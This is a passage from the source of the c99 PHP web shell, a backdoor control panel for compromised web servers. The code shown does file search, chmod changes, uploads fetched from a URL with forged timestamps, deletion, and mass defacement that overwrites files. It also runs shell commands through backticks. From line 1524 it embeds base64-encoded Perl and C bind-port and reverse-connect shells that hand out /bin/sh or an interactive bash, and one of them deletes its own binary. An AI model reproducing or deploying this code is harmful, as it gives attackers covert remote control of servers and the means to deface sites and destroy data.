1097 if (!empty($submit))
1098 {
1099 $found = array();
1100 $found_d = 0;
1101 $found_f = 0;
1102 $a = array
1103 (
1104 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1105 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1106 "text_wwo"=>$search_text_wwo,
1107 "text_cs"=>$search_text_cs,
1108 "text_not"=>$search_text_not
1109 );
1110 $searchtime = getmicrotime();
1111 $in = array_unique(explode(";",$search_in));
1112 foreach($in as $v)
1113 {
1114 c99fsearch($v);
1115 }
1116 $searchtime = round(getmicrotime()-$searchtime,4);
1117 if (count($found) == 0) {echo "<b>No files found!</b>";}
1118 else
1119 {
1120 $ls_arr = $found;
1121 $disp_fullpath = true;
1122 $act = $dspact = "ls";
1123 }
1124 }
1125 echo "<form method=\"POST\">
1126<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1127<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
1128<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1129<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1130<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
1131 <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
1132 <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
1133 <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1134<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
1135 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
1136}
1137if ($act == "chmod")
1138{
1139 $perms = fileperms($d.$f);
1140 if (!$perms) {echo "Can't get current mode.";}
1141 elseif ($submit)
1142 {
1143 if (!isset($owner[0])) {$owner[0] = 0;}
1144 if (!isset($owner[1])) {$owner[1] = 0; }
1145 if (!isset($owner[2])) {$owner[2] = 0;}
1146 if (!isset($group[0])) {$group[0] = 0;}
1147 if (!isset($group[1])) {$group[1] = 0;}
1148 if (!isset($group[2])) {$group[2] = 0;}
1149 if (!isset($world[0])) {$world[0] = 0;}
1150 if (!isset($world[1])) {$world[1] = 0;}
1151 if (!isset($world[2])) {$world[2] = 0;}
1152 $sum_owner = $owner[0] + $owner[1] + $owner[2];
1153 $sum_group = $group[0] + $group[1] + $group[2];
1154 $sum_world = $world[0] + $world[1] + $world[2];
1155 $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
1156 $ret = @chmod($d.$f, $sum_chmod);
1157 if ($ret) {$act = "ls";}
1158 else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
1159 }
1160 else
1161 {
1162 echo "<b>Changing file-mode</b><br>";
1163 $perms = view_perms(fileperms($d.$f));
1164 $length = strlen($perms);
1165 $owner_r = $owner_w = $owner_x =
1166 $group_r = $group_w = $group_x =
1167 $world_r = $world_w = $group_x = "";
1168 if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
1169 if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
1170 if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
1171 if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
1172 if ($perms[9] == "x") {$world_x = " checked";}
1173 echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
1174<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
1175<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
1176<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
1177<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
1178<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
1179<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
1180<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
1181<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
1182<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
1183<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
1184<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
1185</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
1186 }
1187}
1188if ($act == "upload")
1189{
1190 $uploadmess = "";
1191 $uploadpath = str_replace("\\","/",$uploadpath);
1192 if (empty($uploadpath)) {$uploadpath = $d;}
1193 elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
1194 if (!empty($submit))
1195 {
1196 global $HTTP_POST_FILES;
1197 $uploadfile = $HTTP_POST_FILES["uploadfile"];
1198 if (!empty($uploadfile[tmp_name]))
1199 {
1200 if (empty($uploadfilename)) {$destin = $uploadfile[name];}
1201 else {$destin = $userfilename;}
1202 if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
1203 }
1204 elseif (!empty($uploadurl))
1205 {
1206 if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1207 else
1208 {
1209 $destin = explode("/",$destin);
1210 $destin = $destin[count($destin)-1];
1211 if (empty($destin))
1212 {
1213 $i = 0;
1214 $b = "";
1215 while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1216 }
1217 if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1218 else
1219 {
1220 $st = getmicrotime();
1221 $content = @file_get_contents($uploadurl);
1222 $dt = round(getmicrotime()-$st,4);
1223 if (!$content) {$uploadmess .= "Can't download file!<br>";}
1224 else
1225 {
1226 if ($filestealth) {$stat = stat($uploadpath.$destin);}
1227 $fp = fopen($uploadpath.$destin,"w");
1228 if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1229 else
1230 {
1231 fwrite($fp,$content,strlen($content));
1232 fclose($fp);
1233 if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1234 }
1235 }
1236 }
1237 }
1238 }
1239 if ($miniform)
1240 {
1241 echo "<b>".$uploadmess."</b>";
1242 $act = "ls";
1243 }
1244 else
1245 {
1246 echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
1247Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br>
1248Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1249Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1250File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1251<input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br>
1252<input type=\"submit\" name=\"submit\" value=\"Upload\">
1253</form>";
1254 }
1255}
1256if ($act == "delete")
1257{
1258 $delerr = "";
1259 foreach ($actbox as $v)
1260 {
1261 $result = false;
1262 $result = fs_rmobj($v);
1263 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1264 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1265 }
1266 $act = "ls";
1267}
1268if ($act == "deface")
1269{
1270 $deferr = "";
1271 foreach ($actbox as $v)
1272 {
1273 $data = $deface_html;
1274 if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
1275 $data = str_replace("%%%filename%%%",basename($v),$data);
1276 $data = str_replace("%%%filepath%%%",$v,$data);
1277 $fp = @fopen($v,"w");
1278 fwrite($fp,$data);
1279 fclose($fp);
1280 if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
1281 if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
1282 }
1283}
1284if (!$usefsbuff)
1285{
1286 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
1287}
1288else
1289{
1290 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1291 if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1292 if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
1293
1294 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
1295 elseif ($actpastebuff)
1296 {
1297 $psterr = "";
1298 foreach($sess_data["copy"] as $k=>$v)
1299 {
1300 $to = $d.basename($v);
1301 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1302 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1303 }
1304 foreach($sess_data["cut"] as $k=>$v)
1305 {
1306 $to = $d.basename($v);
1307 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1308 unset($sess_data["cut"][$k]);
1309 }
1310 c99_sess_put($sess_data);
1311 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1312 $act = "ls";
1313 }
1314 elseif ($actarcbuff)
1315 {
1316 $arcerr = "";
1317 if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
1318 else {$ext = ".tar.gz";}
1319
1320 if ($ext == ".tar.gz")
1321 {
1322 $cmdline = "tar cfzv";
1323 }
1324 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1325 foreach($objects as $v)
1326 {
1327 $v = str_replace("\\","/",$v);
1328 if (is_dir($v))
1329 {
1330 if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
1331 $v .= "*";
1332 }
1333 $cmdline .= " ".$v;
1334 }
1335 $ret = `$cmdline`;
1336 if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
1337 $ret = str_replace("\r\n","\n");
1338 $ret = explode("\n",$ret);
1339 if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
1340 foreach($sess_data["cut"] as $k=>$v)
1341 {
1342 if (in_array($v,$ret)) {fs_rmobj($v);}
1343 unset($sess_data["cut"][$k]);
1344 }
1345 c99_sess_put($sess_data);
1346 if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
1347 $act = "ls";
1348 }
1349 elseif ($actpastebuff)
1350 {
1351 $psterr = "";
1352 foreach($sess_data["copy"] as $k=>$v)
1353 {
1354 $to = $d.basename($v);
1355 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1356 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1357 }
1358 foreach($sess_data["cut"] as $k=>$v)
1359 {
1360 $to = $d.basename($v);
1361 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1362 unset($sess_data["cut"][$k]);
1363 }
1364 c99_sess_put($sess_data);
1365 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1366 $act = "ls";
1367 }
1368}
1369if ($act == "ls")
1370{
1371 if (count($ls_arr) > 0) {$list = $ls_arr;}
1372 else
1373 {
1374 $list = array();
1375 if ($h = @opendir($d))
1376 {
1377 while ($o = readdir($h)) {$list[] = $d.$o;}
1378 closedir($h);
1379 }
1380 }
1381 if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
1382 else
1383 {
1384 //Building array
1385 $tab = array();
1386 $amount = count($ld)+count($lf);
1387 $vd = "f"; //Viewing mode
1388 if ($vd == "f")
1389 {
1390 $row = array();
1391 $row[] = "<b>Name</b>";
1392 $row[] = "<b>Size</b>";
1393 $row[] = "<b>Modify</b>";
1394 if (!$win)
1395 {$row[] = "<b>Owner/Group</b>";}
1396 $row[] = "<b>Perms</b>";
1397 $row[] = "<b>Action</b>";
1398
1399 $k = $sort[0];
1400 if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
1401 if (empty($sort[1])) {$sort[1] = "d";}
1402 if ($sort[1] != "a")
1403 {
1404 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
1405 }
1406 else
1407 {
1408 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
1409 }
1410
1411 $row[$k] .= $y;
1412 for($i=0;$i<count($row)-1;$i++)
1413 {
1414 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
1415 }
1416
1417 $tab = array();
1418 $tab[cols] = array($row);
1419 $tab[head] = array();
1420 $tab[dirs] = array();
1421 $tab[links] = array();
1422 $tab[files] = array();
1423 foreach ($list as $v)
1424 {
1425 $o = basename($v);
1426 $dir = dirname($v);
1427
1428 if ($disp_fullpath) {$disppath = $v;}
1429 else {$disppath = $o;}
1430 $disppath = str2mini($disppath,60);
1431
1432 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
1433 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
1434 $uo = urlencode($o);
1435 $ud = urlencode($dir);
1436 $uv = urlencode($v);
1437 $row = array();
1438 if ($o == ".")
1439 {
1440 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
1441 $row[] = "LINK";
1442 }
1443 elseif ($o == "..")
1444 {
1445 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
1446 $row[] = "LINK";
1447 }
1448 elseif (is_dir($v))
1449 {
1450 if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
1451 else {$type = "DIR";}
1452 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
1453 $row[] = $type;
1454 }
1455 elseif(is_file($v))
1456 {
1457 $ext = explode(".",$o);
1458 $c = count($ext)-1;
1459 $ext = $ext[$c];
1460 $ext = strtolower($ext);
1461 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> <a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
1462 $row[] = view_size(filesize($v));
1463 }
1464 $row[] = date("d.m.Y H:i:s",filemtime($v));
1465
1466 if (!$win)
1467 {
1468 $ow = @posix_getpwuid(fileowner($v));
1469 $gr = @posix_getgrgid(filegroup($v));
1470 $row[] = $ow["name"]."/".$gr["name"];
1471 }
1472
1473 if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";}
1474 else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
1475 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a> <input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
1476 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a> <input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
1477 if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
1478 elseif (is_link($v)) {$tab[links][] = $row;}
1479 elseif (is_dir($v)) {$tab[dirs][] = $row;}
1480 elseif (is_file($v)) {$tab[files][] = $row;}
1481 }
1482 }
1483 $v = $sort[0];
1484 function tabsort($a, $b)
1485 {
1486 global $v;
1487 return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
1488 }
1489 usort($tab[dirs], "tabsort");
1490 usort($tab[files], "tabsort");
1491 if ($sort[1] == "a")
1492 {
1493 $tab[dirs] = array_reverse($tab[dirs]);
1494 $tab[files] = array_reverse($tab[files]);
1495 }
1496 //Compiling table
1497 $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
1498 echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b></center><br>";
1499 echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
1500 foreach($table as $row)
1501 {
1502 echo "<tr>\r\n";
1503 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
1504 echo "</tr>\r\n";
1505 }
1506 echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
1507 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
1508 {
1509 echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=\"submit\" name=\"actpastebuff\" value=\"Paste\"> <input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\"> ";
1510 }
1511 echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
1512 echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
1513 if ($usefsbuff)
1514 {
1515 echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
1516 echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
1517 echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
1518 }
1519 if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";}
1520 echo "</select> <input type=\"submit\" value=\"Confirm\"></p>";
1521 echo "</form>";
1522 }
1523}
1524if ($act == "bind")
1525{
1526 $bndsrcs = array(
1527"c99sh_bindport.pl"=>
1528"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
1529"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
1530"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
1531"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
1532"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
1533"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
1534"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
1535"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
1536"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
1537"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
1538"c99sh_bindport.c"=>
1539"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
1540"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
1541"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
1542"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
1543"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
1544"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
1545"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
1546"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
1547"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
1548"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
1549"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
1550"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
1551"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
1552"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
1553"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
1554"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
1555"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
1556"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
1557"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
1558"fQ==",
1559"c99sh_backconn.pl"=>
1560"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
1561"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
1562"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
1563"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
1564"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
1565"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
1566"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
1567"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
1568"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
1569"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
1570"c99sh_backconn.c"=>
1571"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
1572"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
1573"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
1574"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
1575"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
1576"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
1577"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
1578"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
1579"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
1580"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
1581"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
1582"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
1583);
1584 $bndportsrcs = array(
1585"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
1586"c99sh_bindport.c"=>array("Using C","%path %port %pass")
1587);
1588 $bcsrcs = array(
1589"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
1590"c99sh_backconn.c"=>array("Using C","%path %host %port")
1591);
1592 if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
1593 else
1594 {
1595 if (!is_array($bind)) {$bind = array();}
1596 if (!is_array($bc)) {$bc = array();}
1597 if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
1598 if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
1599 if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
1600 if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
1601 if (!empty($bindsubmit))
1602 {
1603 echo "<b>Result of binding port:</b><br>";
1604 $v = $bndportsrcs[$bind[src]];
1605 if (empty($v)) {echo "Unknown file!<br>";}
1606 elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
1607 else
1608 {
1609 $srcpath = $tmpdir.$bind[src];
1610 $w = explode(".",$bind[src]);
1611 $ext = $w[count($w)-1];
1612 unset($w[count($w)-1]);
1613 $binpath = $tmpdir.join(".",$w);
1614 if ($ext == "pl") {$binpath = $srcpath;}
1615 @unlink($srcpath);
1616 $fp = fopen($srcpath,"ab+");
1617 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
1618 else
1619 {
